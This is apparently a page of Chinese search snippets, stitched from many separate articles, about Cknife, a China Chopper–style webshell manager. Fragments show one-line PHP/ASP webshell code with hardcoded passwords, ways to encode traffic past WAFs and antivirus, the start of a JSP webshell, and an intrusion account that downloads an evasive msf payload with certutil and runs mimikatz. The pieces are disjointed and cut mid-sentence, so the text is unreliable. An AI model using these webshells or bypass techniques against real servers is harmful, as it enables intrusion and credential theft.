主程序为Cknife.jar,运行后会生成Cknife.db,以及默认的配置文件Config.ini。
0x01 前言 一开始叫我写些关于Cknife的东西我是拒绝的,但是太无敌了真的很寂寞。 这款工具并不是要在精神上取代中国菜刀,它是一个时代的象征,是不可替代的。...0x06过WAF 两种模式: 修改配置文件过WAF 自写马自定义模式过WAF 后续会写一些使用Cknife过WAF的一些文章,敬请关注。
0x00 前言 很多朋友在使用Cknife时都误以为她只是菜刀的跨平台升级版,仅仅多了跨平台的功能,其实小伙伴们还没有用到精髓之处,她其实也是一款过WAF的利器。...没有给大家讲解如何去使用它这是我的责任,我是一个有责任心的基佬,我会对大家负责的,于是有了下面的文章: 0x01 两种方法 Cknife有两种过WAF模式,一种为修改配置文件(Config.ini)过WAF...代码包含且不限于如下代码(只要能构造出类似eval的函数就行,比如PHP的create_function、assert等) ASP: Cknife")%>...ASP.NET: Cknife"],"unsafe");%> PHP: Cknife']);?> Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与C刀进行交互即可。
0x03 CknifeByPass 正常情况下Cknife发送的数据是没有进行编码或加密的,因此会造成某些敏感关键字被dog检测到从而被拦截,所以为了能够让Cknife能够发送编码或加密的内容可以在cknife...首先查看默认情况下Cknife的发包规则,设置Cknife的代理地址和端口是BurpSuite的地址和端口。 ?...拦截后Cknife无法正常使用,直接报错。 ?...此时关闭BurpSuite的拦截,cknife可以正常使用,本篇介绍的流程也就到此结束。 ?...cknife还要很多知识本篇没有涉及到后续再进行总结和探讨。期待大家的交流和讨论。
3、C刀(Cknife) 这是一款跨平台的基于配置文件的中国菜刀,把所有操作给予用户来定义。 github项目地址: https://github.com/Chora10/Cknife ?
Invoke- ReverseDnsLookup(扫描DNS PTR记录) 渗透开始 首先边界web服务器上fastcgi配置错误,导致服务器被getshell 因为网上的菜刀好多都有后门,所以我用开源的CKnife...(介绍地址:跨平台版中国菜刀Cknife发布项目地址:Cknife的github) 因为服务器上有杀毒软件,所以要把一句话木马做一下转换。...绕过思路参考:打狗棒法之进阶篇:Cknife修改配置法秒过安全狗 我用的服务器端木马内容 Cknife']);eval($ms509);?
这里我使用了str_rot13+gz+base64 我们以cknife为例,修改如下文件 ?
可以看到,文件中包含一句话木马代码,木马的密码为 cknife 我们使用C刀连接一下 ?
一句话木马 可以在目标服务器上执行 php 代码,并和一些客户端(如菜刀、Cknife)进行交互的 Webshell。...LandGrey=phpinfo(); Cknife 添加目标 http://127.0.0.1/shell/test/test.php 密码: LandGrey,可成功连接。 ?...例如,利用下面的一句话,请求时,Cknife 携带请求头 Accept: r,密码输入 "LandGrey",即可成功连接一句话木马: ? Cknife 时,注意软件实现有缺陷,会从第二个 ":" 处截断,可改成: Referer: http%3a//www.target.com/ass.php <?
4. 0x04 使用cknife连接一句一句话木马,便成功获得到了网站的webShell了。 ? ?
image.png (15) C刀(Cknife) C刀是一款基于Java开发的完全基于配置文件的中国菜刀,脚本类型支持ASP、ASPX、PHP、JSP、JSPX、Customize,目前完成的功能有...项目地址: https://github.com/Chora10/Cknife image.png (16) QuasiBot QuasiBot是一款php编写的webshell管理工具,可以对webshell
其同类产品(AntSword(蚁剑),Cknife(C刀))等很多,可以简单理解为是外国同类产品的汉化版。 本篇以 中国菜刀 (简称:菜刀)进行讲解。
(15) C刀(Cknife) C刀是一款基于Java开发的完全基于配置文件的中国菜刀,脚本类型支持ASP、ASPX、PHP、JSP、JSPX、Customize,目前完成的功能有:文件管理、数据库管理...项目地址: https://github.com/Chora10/Cknife (16) QuasiBot QuasiBot是一款php编写的webshell管理工具,可以对webshell进行远程批量管理
0x06内网上传webshell 常用的菜刀,Cknife等工具并不存在代理功能,此处使用中国蚁剑工具进行连接,配置蚁剑代理如下所示: ? ? 成功连接到内网的shell后,访问目标系统不同目录 ?
1652002176427_22.jsp 这里IP换成你靶机的,然后文件名换成你自己的,时间戳也换成你自己的就可以了,记住时间戳和文件名之间有一个下划线 到这一步即为成功 附:jsp大马源码(网络资源)连接密码为Cknife...String Pwd = "Cknife"; String cs = "UTF-8"; String EC(String s) throws Exception {
) 兼容平台支持 Windows、Linux 和 Mac 操作系统 项目使用 功能1:一键解密,洞悉攻击行为 支持所有常见webshell交互流量解密 冰蝎 蚁剑 哥斯拉 China Chopper Cknife
•项目地址:https://github.com/BeichenDream/Godzilla image-20211215212156298 C刀(Cknife) C刀是一款基于Java开发的完全基于配置文件的中国菜刀...项目地址: •https://github.com/Chora10/Cknife img Web版菜刀(WebKnife) WebKnife是陌小离练习ajax时候写的一款半成品Web版菜刀,目前完成的功能有
Cknife连接成功 ?
Cknife连接成功 Whoami发现是system权限,那么剩下的就简单了,为了防止护卫神查杀,生成了个msf免杀马,通过certutil下载,然后执行,msf上线,然后迁移进程,load mimikatz
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
云直播
对象存储
腾讯会议
